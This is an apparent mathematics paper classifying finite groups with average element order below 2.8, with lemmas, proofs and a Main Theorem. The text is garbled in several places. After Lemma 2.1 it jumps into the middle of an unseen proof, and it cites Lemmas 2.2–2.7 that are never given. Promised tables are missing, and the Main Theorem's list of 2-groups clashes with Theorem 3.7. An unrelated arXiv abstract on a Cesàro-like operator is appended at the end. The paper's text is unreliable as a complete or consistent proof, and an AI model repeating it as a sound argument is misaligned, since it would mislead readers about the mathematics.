For a finite group \(G\), \(\psi(G)\) was first introduced in [1]; it denotes the sum of the element orders of \(G\), i.e., \(\psi(G)=\sum\limits_{x\in G}o(x)\). Later the average order of \(G\) was defined as \(\mathrm{o}(G)=\frac{\psi(G)}{|G|}\). At first glance, these quantities are not expected to inform us much about the structure of \(G\). As an example, \(\psi(A_{4})=\psi(D_{10})=31\), and also \(\mathrm{o}(D_{12})=\mathrm{o}(C_{4})=2.75\). If \(G\) is a group such that there exist exactly \(k\) non-isomorphic groups with average order \(\mathrm{o}(G)\), then we say \(G\) is _\(k\)-recognizable by average order_. A \(1\)-recognizable group is called _characterizable_. In [5], it is conjectured that \(\mathrm{o}(G)<\mathrm{o}(A_{5})\) guarantees the solvability of \(G\), which turned out to be true when Herzog, Longobardi and Maj proved it in [3]. In that paper, they also classified all finite groups with \(\mathrm{o}(G)\leq\mathrm{o}(S_{3})\). Later in [4], they proved that \(A_{5}\) is characterizable by average order, meaning that \(\mathrm{o}(G)=\mathrm{o}(A_{5})\) implies \(G\cong A_{5}\). Meanwhile Tarnauceanu in [9] classified all finite groups with \(\mathrm{o}(G)\leq\mathrm{o}(A_{4})\), where he showed that \(\mathrm{o}(G)<\mathrm{o}(A_{4})\) implies that \(G\) is supersolvable, and that \(\mathrm{o}(G)=\mathrm{o}(A_{4})\) leads to \(G\cong A_{4}\). Inspired by the above results, in this paper we determine the groups whose average orders are less than \(2.8\). Note that the bound \(2.8\) is close to \(\mathrm{o}(S_{4})=\frac{67}{24}\approx 2.791\). As a consequence, we give a new characterization of some finite groups using the average order. More precisely, we prove the following theorem:

**Main Theorem**: Let \(G\) be a finite group satisfying \(\mathrm{o}(G)<2.8\). Then \(G\) is isomorphic to one of the following groups:

1. \(D_{12}\);
2. \(S_{4}\);
3. \(C_{3}\) or \(C_{3}\times C_{3}\);
4. \(C_{2}^{2k}\rtimes C_{3}\), for some natural number \(k\), which is a Frobenius group;
5. a \(2\)-group of one of the following types, where \(E\cong C_{2}^{m}\), for some \(m\geq 0\):
   (a) \(C_{4}\);
   (b) \(D_{8}\times E\);
   (c) an elementary abelian \(2\)-group;
   (d) \(D(C_{4}\times C_{4})\times E\), where \(D(C_{4}\times C_{4})\) is the generalized dihedral group of \(C_{4}\times C_{4}\).

## 2. Preliminaries

**Lemma 2.1**: _Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then the following statements hold:_

1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_;_
2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._
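For concreteness, the sample values quoted in the Introduction can be checked by counting element orders directly:

\[\begin{aligned}
\psi(A_{4})&=1\cdot 1+3\cdot 2+8\cdot 3=31, & \psi(D_{10})&=1\cdot 1+5\cdot 2+4\cdot 5=31,\\
\psi(C_{4})&=1+2+4+4=11, & \mathrm{o}(C_{4})&=\tfrac{11}{4}=2.75,\\
\psi(D_{12})&=1\cdot 1+7\cdot 2+2\cdot 3+2\cdot 6=33, & \mathrm{o}(D_{12})&=\tfrac{33}{12}=2.75,\\
\psi(S_{4})&=1\cdot 1+9\cdot 2+8\cdot 3+6\cdot 4=67, & \mathrm{o}(S_{4})&=\tfrac{67}{24}\approx 2.791.
\end{aligned}\]

Here and below, \(n_{k}(G)\) denotes the number of elements of order \(k\) in \(G\). Since the elements of order at least \(3\) occur in inverse pairs \(\{x,x^{-1}\}\) with \(o(x)=o(x^{-1})\), we always have \(\psi(G)=1+2n_{2}(G)+(\text{an even number})\); in particular, \(\psi(G)\) is odd for every finite group \(G\).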
Note that \(\tau_{x}\) maps \(m\in M\) to its inverse if and only if \(o(xm)=2\). Since \(n_{2}(G\setminus M)>2|M|/3\), we get that \(\tau_{x}\) maps more than \(\frac{2}{3}\) of the elements of \(M\) to their inverses. As, \(r(M,\tau_{x})>\frac{2}{3}\geq\frac{2}{p+1}\), for any prime number \(p\), by Lemma 2.2, \(M\) is nilpotent. ## 3. main results **Lemma 3.1**: _Let \(G\) be a finite group and \(m>1\) be an odd integer._ 1. _If_ \(|G|=2m\)_, then_ \({\rm o}(G)\geq{\rm o}(D(C_{5}\times C_{5}))=3.42\)_, unless_ \(G\cong D(C_{3}^{k})\)_, for some integer_ \(k\)_, or_ \(G\cong D_{10}\)_._ 2. _If_ \(|G|=4m\)_, then_ \({\rm o}(G)>3\)_, unless_ \(G\cong A_{4}\) _or_ \(D_{12}\)_._ _Proof._\((i)\) Let \(N\) be the Hall \(2^{\prime}\)-subgroup of \(G\), and \(G=N\cup xN\), for some involution \(x\in G\setminus N\). Note that \(N\) is a group of odd order, so by [3, Lemma 1.1], \({\rm o}(N)\geq{\rm o}(C_{3})=\frac{7}{3}\). Note that for any \(n\in N\), \(o(xn)=2\) if and only if \(n^{x}=n^{-1}\). Hence, by [2, Lemma 10.4.1], \(n_{2}(xN)=n_{2}(G\setminus N)\) is a divisor of \(|N|\). If \(n_{2}(G\setminus N)\leq\frac{|N|}{3}=\frac{|G|}{6}\), then \(\psi(xN)\geq 2n_{2}(xN)+6(|N|-n_{2}(xN))\geq 2\frac{|G|}{6}+6\frac{|G|}{3}=\frac{7}{3}|G|\). Thus, \({\rm o}(G)\geq\frac{{\rm o}(N)}{2}+\frac{7}{3}\geq\frac{7}{6}+\frac{7}{3}=3.5\). If \(n_{2}(G\setminus N)>\frac{|N|}{3}\), we see that \(n_{2}(xN)=|N|\). So \(\langle x\rangle\) acts Frobeniusly on \(N\). Therefore, \(N\) is abelian. First assume that \(N\) is a \(3\)-group. If \({\rm exp}(N){>3}\), then \(N\) has a quotient isomorphic to \(C_{9}\), and so \({\rm o}(N)\geq{\rm o}(C_{9})>6\). Hence, \({\rm o}(G)=\frac{{\rm o}(N)}{2}+1>3+1=4\). Otherwise, \({\rm exp}(N){=3}\), and so \(G\cong D(C_{3}^{k})\), for some \(k\), as wanted. If \(N\) is not a \(3\)-group and \(m>5\), then by Lemma 2.5\((ii)\), \({\rm o}(N)\geq{\rm o}(C_{5}\times C_{5})=4.84\), and so \({\rm o}(G)=\frac{{\rm o}(N)}{2}+1\geq 2.42+1=3.42\). Finally, for \(m=5\), \(G\cong D_{10}\), and \({\rm o}(D_{10})=3.1\), as desired. \((ii)\) Let \(Q\in\operatorname{Syl}_{2}(G)\). If \(Q\) is cyclic, then \(G\cong N\rtimes Q\), where \(N\) is the Hall \(2^{\prime}\)-subgroup of \(G\). Since \(N\) is of odd order, \(\operatorname{o}(N)\geq\operatorname{o}(C_{3})=\frac{7}{3}\). By Lemma 2.1, \(\operatorname{o}(G)\geq\frac{\operatorname{o}(N)}{4}+\frac{10}{4}\geq\frac{7}{ 12}+\frac{10}{4}=\frac{37}{12}>3\). Now, assume that \(Q\) is not cyclic. Let \(m=3\). For the nilpotent groups of order \(12\), by Lemma 2.5, \(\operatorname{o}(G)>3\). Looking at the non-nilpotent groups of order \(12\) with non-cyclic Sylow \(2\)-subgroups, we see that the only possibilities are \(D_{12}\) and \(A_{4}\). From now on, we assume that \(m\geq 5\), and by induction on \(m\), we prove that \(\operatorname{o}(G)>3\). Note that by [3, Theorem C], if \(G\) is non-solvable, then \(\operatorname{o}(G)>\operatorname{o}(A_{5})>3.5\), and the result holds. If \(G\) is solvable, there exists a maximal normal subgroup \(M\) of index \(p\), for some prime \(p\). From the fact that \(p-1+\frac{1}{p}=\operatorname{o}(C_{p})=\operatorname{o}(\frac{G}{M})< \operatorname{o}(G)\), if \(p\geq 5\), we get that \(\operatorname{o}(G)>3\). In the sequel, we consider \(p\in\{2,3\}\). Checking by **GAP**, we get that the statement holds for groups of order \(36\) and so in the following we may assume that \(|G|\neq 36\). Now we consider the following cases. **Case 1)** If \(p=2\), then \(G\) has a normal \(2\)-complement, say \(K\). 
Let \(K_{0}\leq K\) be a minimal normal subgroup of \(G\). If \(K_{0}<K\), we have \(|G:K_{0}|=4m^{\prime}\), where \(m^{\prime}\geq 3\). If \(m^{\prime}\geq 5\), by the induction hypothesis, \(\operatorname{o}(G)>\operatorname{o}(G/K_{0})>3\). Let \(m^{\prime}=3\). So, \(|G:K_{0}|=12\). Note that since \(A_{4}\) does not have a normal \(2\)-complement, \(G/K_{0}\ncong A_{4}\). If \(G/K_{0}\ncong D_{12}\), then by the discussion we had for groups of order \(12\), \(\operatorname{o}(G)>\operatorname{o}(G/K_{0})>3\). Otherwise, \(G/K_{0}\cong D_{12}\). Let \(M\) be a subgroup of \(G\) such that \(M/K_{0}\cong C_{6}\). So, \(\operatorname{o}(M)>\operatorname{o}(C_{6})=3.5\). If \(n_{2}(G\setminus M)\leq|G|/3\), then \(\operatorname{o}(G)\geq\frac{\psi(M)+2|G|/3+6|G|/6}{|G|}\geq\frac{7}{4}+\frac{ 5}{3}>3\). Otherwise, \(n_{2}(G\setminus M)>|G|/3\), then by Lemma 2.7, \(M\) is nilpotent. Thus, by Lemma 2.5\((i)\), \(\operatorname{o}(M)>4\). Therefore, \(\operatorname{o}(G)\geq\frac{\operatorname{o}(M)}{2}+1>3\), as desired. Now assume that \(K_{0}=K\). Therefore, by Lemma 2.3, \(G\cong D(C_{2q})\) or \(G\cong C_{2q}\times C_{2}\), where \(q>3\). In the first case, \(\operatorname{o}(G)=\frac{\operatorname{o}(C_{q}\times C_{2})}{2}+1>3\). In the latter case, by Lemma 2.5\((i)\), \(\operatorname{o}(G)>3\). **Case 2)** If \(p=3\), then \(G=M\cup xM\cup x^{2}M\), for some \(x\in G\setminus M\). On the other hand, by the induction hypothesis, \(\operatorname{o}(M)>3\). So, \(\operatorname{o}(G)\geq\frac{\operatorname{o}(M)}{3}+2>3\). **Lemma 3.2**: _Let \(G\) be a finite group with \(|\pi(G)|\geq 2\). Then \(\operatorname{o}(G)\geq\operatorname{o}(S_{3})=\frac{13}{6}\), and equality holds if and only if \(G\cong S_{3}\)._ Proof.: For the groups of order \(6\), the statement holds. So we may assume that \(|G|\geq 10\). If \(G\) is of odd order, as \(\exp(G)\geq 3\), \(\operatorname{o}(G)\geq 3-\frac{2}{|G|}>2.86>\frac{13}{6}\). Now assume that \(G\) is of even order. If \(n_{2}(G)>\frac{2}{3}|G|-1\), then since \(r(G,1_{G})>\frac{2}{3}\), by Lemma 2.2, the Sylow \(2\)-subgroup of \(G\), say \(P\), is normal in \(G\). Now because \(|G:P|<\frac{|G|}{n_{2}(G)+1}<\frac{3}{2}\), \(G\) is a \(2\)-group, a contradiction. Hence, \(n_{2}(G)\leq\frac{2}{3}|G|-1\). As, \(\psi(G)\geq 1+2n_{2}(G)+3(|G|-n_{2}(G)-1)\geq\frac{7}{3}|G|-1\), we have \(\operatorname{o}(G)\geq\frac{7}{3}-\frac{1}{|G|}>\operatorname{o}(S_{3})\), since \(|G|\geq 10\). Previous lemma implies that \(\operatorname{o}(G)\leq S_{3}\), leads to \(G\cong S_{3}\), or \(G\) is a \(2\)-group. Now by [10, Corollary], we get that \(G\) is an elementary abelian \(2\)-group, if \(G\ncong S_{3}\), which is a new proof for [3, Theroem A]. The following lemma is obtained by [9, Theorem 1.2], but we prove it without referring to that result. **Lemma 3.3**: _If \(\operatorname{o}(G)<2.4\), then \(G\) is isomorphic to one of the following groups:_ 1. \(C_{3}\)_;_ 2. \(D_{8}\)_;_ 3. \(S_{3}\)_;_ 4. \(D(C_{3}\times C_{3})\)_;_ 5. _an elementary abelian_ \(2\)_-group._ Proof.: We note that the result holds when \(|G|\leq 10\). So we may assume that \(|G|\geq 11\). If \(|G|\) is odd, as \(exp(G)\geq 3\), it is easy to check that \(\mathrm{o}(G)\geq 3-2/|G|>\mathrm{o}(C_{3}\times C_{3})>2.7\), a contradiction. Now assume that \(|G|\) is even. Obviously the statement holds for elementary abelian \(2\)-groups and if \(G\) is a \(2\)-group which is not elementary abelian, then by [10, Corollary], \(n_{2}(G)\leq\frac{3}{4}|G|-1\). 
Therefore, \(\mathrm{o}(G)\geq\frac{1+2n_{2}(G)+4(|G|-n_{2}(G)-1)}{|G|}=2.5-\frac{1}{|G|}\), and since \(\mathrm{o}(G)<2.4\), we have \(|G|\leq 8\), a contradiction. In the sequel, suppose that \(G\) is not a \(2\)-group. If there exists a non-normal Sylow \(p\)-subgroup \(P\) of \(G\), for some odd prime \(p\), then by considering \(1_{G}\in\mathrm{Aut}(G)\) in Lemma 2.2, we have \(r(G,1_{G})\leq\frac{2}{p+1}\). It follows that \(n_{2}(G)\leq\frac{2}{p+1}|G|-1\). So, \(\psi(G)\geq 1+2n_{2}(G)+3(|G|-n_{2}(G)-1)>(3-\frac{2}{p+1})|G|-1\). Therefore, \(\mathrm{o}(G)\geq 2.5-\frac{1}{|G|}>2.4\), since \(p\geq 3\) and \(|G|\geq 11\), a contradiction. Therefore, \(G\cong H\rtimes Q\), where \(H\) is the Hall \(2^{\prime}\)-subgroup of \(G\), and \(Q\) is a Sylow \(2\)-subgroup of \(G\). Note that as we discussed in Lemma 3.1, if \(|Q|\leq 4\), then \(G\cong D(C_{3}\times C_{3})\), as desired. Let \(|Q|\geq 8\) and \(M\) be a subgroup of index \(2\) of \(G\). If \(n_{2}(G\setminus M)\leq\frac{|G|}{3}\), as it was discussed multiple times, \(\mathrm{o}(G)\geq\frac{\mathrm{o}(M)}{2}+\frac{4}{3}\). Since \(|M|\) has at least two prime divisors, by Lemma 3.2, \(\mathrm{o}(M)>\frac{13}{6}\), and so \(\mathrm{o}(G)>2.4\), which is a contradiction. Therefore, \(n_{2}(G\setminus M)>\frac{|G|}{3}\), and by Lemma 2.7, it follows that \(M\) is nilpotent. Now Lemma 2.5\((i)\) implies that \(\mathrm{o}(M)>4\). Hence, \(\mathrm{o}(G)\geq\frac{\mathrm{o}(M)}{2}+1>3\), a contradiction. Note that the previous lemma implies that \(\mathrm{o}(G)<2\) if and only if \(G\) is elementary abelian. **Remark 3.4**: _Throughout this paper, for simplicity we say \(G\) is a \(\star\)-group, if \(G\) is isomorphic to one of the following groups:_ 1. \(D_{8}\times D_{8}\)_;_ 2. \(D(A)\)_, where_ \(A\) _is an abelian_ \(2\)_-group;_ 3. \(H(r)\)_, for some integer_ \(r\)_;_ 4. \(S(r)\)_, for some integer_ \(r\)_._ **Lemma 3.5**: _Let \(G\) be a \(2\)-group with \(\mathrm{o}(G)<2.8\). Then \(n_{2}(G)>\frac{3}{5}|G|-2\), if \(|G|\geq 16\)._ Proof.: On the contrary assume that \(n_{2}(G)\leq\frac{3}{5}|G|-2\). So, \(\mathrm{o}(G)\geq\frac{1+2n_{2}(G)+4(|G|-n_{2}(G)-1)}{|G|}\geq 2.8+1/|G|>2.8\), a contradiction. **Lemma 3.6**: _Let \(G\) be a \(\star\)-group, and \(\mathrm{o}(G)<2.8\). Then \(G\) is isomorphic to one of the following groups:_ 1. \(H(2)\)_;_ 2. \(S(2)\)_;_ 3. \(D(C_{4}\times C_{4})\)_;_ 4. \(D(C_{4}\times C_{2}^{k})\)_, for some integer_ \(k\geq 0\)_._ Proof.: We consider each \(\star\)-group separately. Note that \(\mathrm{o}(D_{8}\times D_{8})=\frac{183}{64}>2.8\). If \(G\cong D(A)\), where \(A\) is an abelian \(2\)-group, then \(\mathrm{o}(G)=\frac{\mathrm{o}(A)}{2}+1\), and since \(\mathrm{o}(G)<2.8\), if follows that \(\mathrm{o}(A)<3.6\). Since \(\mathrm{o}(C_{8})>\mathrm{o}(C_{4}^{3})>\mathrm{o}(C_{4}\times C_{4}\times C _{2})>3.6\), we get that \(A\) is isomorphic to \(C_{4}\times C_{4}\) or \(C_{4}\times C_{2}^{k}\), for some integer \(k\geq 0\). If \(G\cong H(r)\), then \(|H(r)|=2^{2r+1}\), and \(n_{2}(H(r))=2^{2r}+2^{r}-1\). Now by Lemma 3.5, \(r\leq 2\). If \(G\cong S(r)\), then \(|S(r)|=2^{2r+1}\), and we can see that \(n_{2}(S(r))=2^{2r}+2^{r}-1\), which implies that \(r\leq 2\), by Lemma 3.5. Note that \(S(1)\cong H(1)\cong D_{8}\). Before we classify \(2\)-groups with \(\mathrm{o}(G)<2.8\), we take a close look at the bellow theorem, which is proved by Wall in [10, Pages 261-262]. It is the key to classify such \(2\)-groups. **Theorem** (C. T. C. Wall, [10]): Let \(G\) be a finite group. 
If \(n_{2}(G)>\frac{1}{2}|G|-1\), then \(G\) is isomorphic to one of the following groups: 1. \(D(A)\), where \(A\) is an abelian group; 2. \(D_{8}\times D_{8}\times C_{2}^{k}\), for some integer \(k\geq 0\); 3. \(H(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\); 4. \(S(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\). **Theorem 3.7**: _Let \(G\) be a \(2\)-group with \(\mathrm{o}(G)<2.8\). Then \(G\) is isomorphic to one of the following groups, where \(k\geq 0\) is an integer:_ 1. \(C_{4}\)_;_ 2. \(D_{8}\times C_{2}^{k}\)_;_ 3. \(D(C_{4}\times C_{4})\times C_{2}^{k}\)_;_ 4. \((D_{8}*D_{8})\times C_{2}^{k}\)_;_ 5. \(S(2)\times C_{2}^{k}\)_;_ 6. _an elementary abelian_ \(2\)_-group._ _Proof._ It is easy to check that the statement holds when \(|G|<16\). Assume that \(|G|\geq 16\). If \(G\) is abelian and \(G\) has a factor isomorphic to \(C_{4}\times C_{2}\) or \(C_{8}\), then \(\mathrm{o}(G)>\mathrm{o}(C_{4}\times C_{2})=2.875>2.8\), a contradiction. Obviously the result holds for elementary abelian \(2\)-groups. Hence, assume that \(G\) is non-abelian. By Lemma 3.5, we get that \(n_{2}(G)>\frac{3}{5}|G|-2\), and since \(|G|\geq 16\), \(n_{2}(G)>\frac{1}{2}|G|-1\). Now by the above theorem, we see that \(G\) is isomorphic to one of the following \(2\)-groups: 1. \(D(A)\), where \(A\) is an abelian \(2\)-groups; 2. \(D_{8}\times D_{8}\times C_{2}^{k}\), for some integer \(k\geq 0\); 3. \(H(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\); 4. \(S(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\). In case _(1)_, the statement holds by Lemma 3.6. In other cases, let \(E\) be the direct factor isomorphic to \(C_{2}^{k}\), and since \(\mathrm{o}(G/E)\leq\mathrm{o}(G)<2.8\), again by Lemma 3.6 and some easy calculations we get the result. **Proof of the Main Theorem.** Easily we can see that, if \(G\) is isomorphic to one of the groups listed in the Main Theorem, then \(\mathrm{o}(G)<2.8\). Assume that \(G\) is a counterexample of minimal order. Remark that as \(\mathrm{o}(G)<\mathrm{o}(A_{5})\), by [3, Theorem C], \(G\) is solvable. Let \(N\) be a minimal normal \(q\)-subgroup of \(G\), for some prime \(q\). As \(\mathrm{o}(G/N)<\mathrm{o}(G)\) and there is no cyclic counterexample, \(G/N\) satisfies the hypothesis of the theorem. So we consider each possibility for \(G/N\) separately: \((i)\) Let \(G/N\cong D_{12}\). In this case, \(G\) has a subgroup of index \(2\), say \(M\), such that \(M\) has a quotient isomorphic to \(C_{6}\). So, \(\mathrm{o}(M)>\mathrm{o}(C_{6})=3.5\). If \(n_{2}(G\setminus M)\leq|G|/3\), then \(\mathrm{o}(G)\geq\frac{\psi(M)+2|G|/3+4|G|/6}{|G|}>\frac{7}{4}+\frac{4}{3}>2.8\), a contradiction. Hence, \(n_{2}(G\setminus M)>|G|/3\), and by Lemma 2.7, \(M\) is nilpotent. So by Lemma 2.5, \(\mathrm{o}(M)>4\), implying a contradiction by Lemma 2.6. **(\(ii\))** Let \(G/N\cong S_{4}\). In this case, by Lemma 2.1, \(\mathrm{o}(G)\geq 2.75+\frac{\mathrm{o}(N)}{24}\). Since \(N\) is non-trivial, we get that \(\mathrm{o}(N)\geq 1.5\), hence \(\mathrm{o}(G)>2.8\), a contradiction. \((iii)\) Let \(G/N\cong C_{3}^{a}\), where \(a\in\{1,2\}\). In this case, let \(M\) be a normal subgroup of \(G\) of index \(3\). By Lemma 2.6, \({\rm o}(M)<2.4\). Now by Lemma 3.3, \(a=1\) and the only possibilities for \(M\) are \(C_{3}\) and \(C_{2}^{k}\), for some integer \(k\). In the first case, as \({\rm o}(C_{9})>6\), \(G\cong C_{3}^{2}\), we get a contradiction. 
In the second case, \(G\) is a group of order \(3\cdot 2^{k}\) and Fitting lemma implies that \(N=C_{N}(P)\times[P,N]\), where \(P\in{\rm Syl}_{3}(G)\). By the fact that \(N\) is a minimal normal subgroup of \(G\) and \(C_{N}(P)\triangleleft G\), we get that either \(G\) is a Frobenius group described in Case \((iv)\), which is impossible as \(G\) is a counterexample, or \(G=P\times N\), a contradiction by Lemma 2.5\((i)\). **(\(iv\))** Let \(G/N\cong C_{2}^{2k}\rtimes C_{3}\), be a Frobenius group, for some integer \(k\). If \(N\) is a \(2\)-group, then \(N\leq{\bf Z}(P)\), where \(P\) is the Sylow \(2\)-subgroup of \(G\). Note that by Lemma 2.6, \({\rm o}(P)<2.4\), and by Lemma 3.3, we get that \(P\cong D_{8}\) or \(P\cong C_{2}^{a}\), for some integer \(a\). Note that as \({\rm Aut}(D_{8})\cong D_{8}\), the first case implies the nilpotency of \(G\), a contradiction by Lemma 2.5. Therefore, \(P\cong C_{2}^{a}\). First, assume that \(N\leq{\bf Z}(G)\), then \(|N|=2\). Thus, \(n_{6}(G\setminus P)\geq n_{3}(G\setminus P)\), and \[{\rm o}(G)\geq\frac{\psi(P)+3(|G|-|P|)/2+6(|G|-|P|)/2}{3|P|}=\frac{{\rm o}(P) }{3}+3>3,\] a contradiction. So, \(N\cap{\bf Z}(G)=1\) and we get that the Sylow \(3\)-subgroup of \(G\) acts on \(N\) and \(G/N\), Frobeniusly. Therefore, \(G\) is a Frobenius group with an elementary abelian \(2\)-group as its kernel, which is the group described in Case \((iv)\), a contradiction. Now, we assume that \(|N|\) is odd. In this case, using Lemma 2.6, \({\rm o}(M)<2.4\), where \(M\) is an index \(3\) normal subgroup of \(G\). So, by Lemma 3.3, \(M\cong D(C_{3}\times C_{3})\), which implies \(2k=1\), a contradiction. **(\(v\))** Let \(G/N\) be a \(2\)-group. Note that by Theorem 3.7, \(G\) is not a \(2\)-group. Now by Lemma 3.1, \(|G/N|\geq 8\). We claim that \(G/G^{\prime}N\) is an elementary abelian \(2\)-group. Otherwise, there exists a normal subgroup \(H\) of \(G\) such that \(G/H\cong C_{4}\), \({\rm o}(G)\geq\frac{\psi(H)+10|H|}{4|H|}=\frac{{\rm o}(H)}{4}+2.5\), which implies that \({\rm o}(H)<1.2\), a contradiction. So, \(G/G^{\prime}N\) is an elementary abelian \(2\)-group. First, let \(G^{\prime}N=N\). Then every subgroup of order \(2|N|\) is a normal subgroup of \(G\). Let \(K\) be such a subgroup. Then the Sylow \(q\)-subgroup of \({\bf Z}(K)\) is normal in \(G\) and by the fact that \(N\) is a minimal normal subgroup, either \(K\cong N\times M\), where \(M\) is a group of order \(2\), or \(K\) is a Frobenius group. If the first case occurs, by the minimality of \(|G|\), \(G/M\) is isomorphic to \(D_{12}\). Note that since \(G/N\) is completely reducible, \(G\) splits on \(M\). Therefore, \(G\cong C_{2}\times D_{12}\), which is a contradiction, since \({\rm o}(C_{2}\times D_{12})=\frac{73}{24}>3\). So, \(K\) is a Frobenius group. Since this holds for all subgroups of order \(2|N|\), we get that \(G\) is a Frobenius group and \(G/N\cong C_{2}\), a contradiction. Therefore, \(N<G^{\prime}N\). Let \(S\) be a normal subgroup of \(G\) containing \(N\), such that \(G^{\prime}N/S\) is a chief factor of \(G\), isomorphic to \(C_{2}\). Therefore, \(G/S\) is a generalized extraspecial group (see [8]), and by Theorem 3.7, we conclude that \(G/S\cong D_{8}\times C_{2}^{k}\) or \(G/S\cong D_{8}*D_{8}\times C_{2}^{k}\), for some \(k\geq 0\). In the first case, \(G\) has a factor \(G/L\) isomorphic to \(D_{8}\). Let \(T/L\) be a subgroup of \(G/L\) such that \(T/L\cong C_{4}\). Note that \(N\leq L\), hence, \({\rm o}(L)>2\). 
Therefore, \({\rm o}(T)\geq\frac{\psi(L)+10|L|}{4|L|}=2.5+\frac{{\rm o}(L)}{4}>3\). If \(n_{2}(G\setminus T)\leq|G|/3\), then \({\rm o}(G)\geq\frac{\psi(T)+2|G|/3+4|G|/6}{|G|}=\frac{{\rm o}(T)}{2}+\frac{4}{3}>2.8\), a contradiction. So, \(n_{2}(G\setminus T)>|G|/3\), and by Lemma 2.7, \(T\) is nilpotent. Then, by Lemma 2.5\((i)\), \({\rm o}(T)>4\), which implies a contradiction by Lemma 2.6. In the second case, there exists a subgroup \(W\leq G\) of index \(2\), where \(W\) has a quotient, say \(W/H\), isomorphic to \(D_{8}*C_{4}\). Note that \({\rm o}(D_{8}*C_{4})=\frac{47}{16}=2.9375\), and since \(N\leq H\), \({\rm o}(H)>2\). By Lemma 2.1, we get that \({\rm o}(W)>3\). Now, similar to the previous case, we get a contradiction.

\((vi)\) Let \(G/N\cong C_{3}^{k}\rtimes C_{2}\) be a Frobenius group, for some integer \(k\). By assumption, \(|N|=q^{a}\), for some integer \(a\). If \(q\) is odd, then by Lemma 3.1\((i)\), \(q=3\) and \(G\cong C_{3}^{a+k}\rtimes C_{2}\), which is a Frobenius group, a contradiction. So, \(q=2\). Note that every subgroup containing \(N\) of order \(3|N|\) is a normal subgroup of \(G\). Hence, the Sylow \(2\)-subgroup of \({\bf Z}(M)\) is a normal subgroup of \(G\), and as \(N\) is minimal normal in \(G\), either \({\bf Z}(M)=M\) or \({\bf Z}(M)=1\). In the first case, \(M=N\times Q\), where \(Q\) is the Sylow \(3\)-subgroup of \(M\). By the above discussion, \(G/Q\) is not isomorphic to the groups stated in Cases \((i)\)-\((v)\), and since \(4\mid|G|\), we get that \(G/Q\) is not isomorphic to the group mentioned in Case \((vi)\), a contradiction to the minimality of \(|G|\). Whence, \({\bf Z}(M)=1\), which yields that \(M\) is a Frobenius group. Thus, there is no element of order \(6\) in \(G\), implying that there is a normal subgroup of \(G\) of index \(2\), say \(T\), which is a Frobenius group, and by the structure of Frobenius groups, we get that \(k=1\). So, \({\rm Syl}_{2}(G)=\{P_{1},P_{2},P_{3}\}\), and \(N=P_{i}\cap P_{j}\), for \(1\leq i<j\leq 3\). If the Sylow \(2\)-subgroups of \(G\) are abelian, then \(\bigcup\limits_{i=1}^{3}P_{i}\subset C_{G}(N)\), hence \(C_{G}(N)=G\), a contradiction. Whence, the Sylow \(2\)-subgroups of \(G\) are not abelian and \(|G|\geq 24\). So by [10, Corollary], every Sylow \(2\)-subgroup of \(G\) has at least \(|G|/12\) elements of order \(4\). On the other hand, we know that \(n_{3}(G)=|G|-|P_{1}\cup P_{2}\cup P_{3}|=|G|/3\). Hence, \(\psi(G)=1+3n_{3}(G)+4n_{4}(G)+2(|G|-n_{3}(G)-n_{4}(G)-1)\geq\frac{17}{6}|G|-1\). Hence, \({\rm o}(G)\geq\frac{17}{6}-\frac{1}{|G|}\), which implies that \(|G|=24\), and so \(G\cong S_{4}\), a contradiction. \(\blacksquare\)

**Remark 3.8**: _All the groups in the Main Theorem and their average orders are listed in the following tables:_

Therefore, \(m=1\), and \(H\) is a \(2\)-group of order \(2^{k+5}\) with \(\mathrm{o}(H)<2.8\). Now Table B shows that \(H\) is isomorphic to one of the three mentioned groups. \(\blacksquare\)

According to the above corollary we pose the following two questions:

**Question 3.9**: What are the values of \(n\) for which there exists an \(n\)-recognizable group by average order?

**Question 3.10**: Is there any finite group \(G\) such that there exist infinitely many non-isomorphic groups with average order \(\mathrm{o}(G)\)?
As an application, by calculating the average orders in the Main Theorem, we get that other than \(S_{4}\), there exists no group \(G\) such that \(\mathrm{o}(G)\) lies in the interval \([\frac{67}{24},2.8]\). This is a partial answer to [6, Conjecture 2.11], about the density of \(Im(\mathrm{o})=\{\mathrm{o}(G)\mid G\) is a finite group\(\}\). Now we see that \(Im(\mathrm{o})\) is not dense in \([a,\infty)\), for any \(a\leq\frac{67}{24}\).

**Conflict of Interest** The authors have no conflicts of interest to declare. All co-authors have seen and agree with the contents of the manuscript and there is no financial interest to report.
2305.03333
The Ces`aro-like operator on some analytic function spaces
Let $\mu$ be a finite positive Borel measure on the interval $[0, 1)$ and $f(z)=\sum_{n=0}^{\infty}a_{n}z^{n} \in H(\mathbb{D})$. The Ces\`aro-like operator is defined by $$ \mathcal {C}_{\mu} (f)(z)=\sum^\infty_{n=0}\left(\mu_n\sum^n_{k=0}a_k\right)z^n, \ z\in \mathbb{D}, $$ where, for $n\geq 0$, $\mu_n$ denotes the $n$-th moment of the measure $\mu$, that is, $\mu_n=\int_{[0, 1)} t^{n}d\mu(t)$. Let $X$ and $Y$ be subspaces of $H( \mathbb{D})$, the purpose of this paper is to study the action of $\mathcal {C}_{\mu}$ on distinct pairs $(X, Y)$. The spaces considered in this paper are Hardy space $H^{p}(0<p\leq\infty)$, Morrey space $L^{2,\lambda}(0<\lambda\leq1)$, mean Lipschitz space, Bloch type space, etc.
Pengcheng Tang
2023-05-05T07:23:30Z
http://arxiv.org/abs/2305.03333v1
